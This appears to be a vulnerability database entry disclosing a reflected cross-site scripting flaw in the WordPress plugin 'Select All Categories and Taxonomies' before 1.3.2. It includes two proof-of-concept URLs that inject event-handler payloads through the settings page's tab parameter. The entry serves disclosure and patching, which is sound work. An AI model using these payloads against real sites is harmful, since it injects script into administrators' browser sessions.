logo
DATABASE RESOURCES PRICING ABOUT US

Select All Categories and Taxonomies < 1.3.2 - Reflected Cross-Site Scripting (XSS)

Description

The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue ### PoC https://example.com/wp-admin/options-general.php?page=moove-taxonomy-settings&tab;=" onMouseOver="alert(1); https://example.com/wp-admin/options-general.php?page=moove-taxonomy-settings&tab;="+style%3D"animation-name%3Aspinner"+onanimationstart%3D"alert(%2FXSS%2F)


Affected Software


CPE Name Name Version
select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons 1.3.2

Related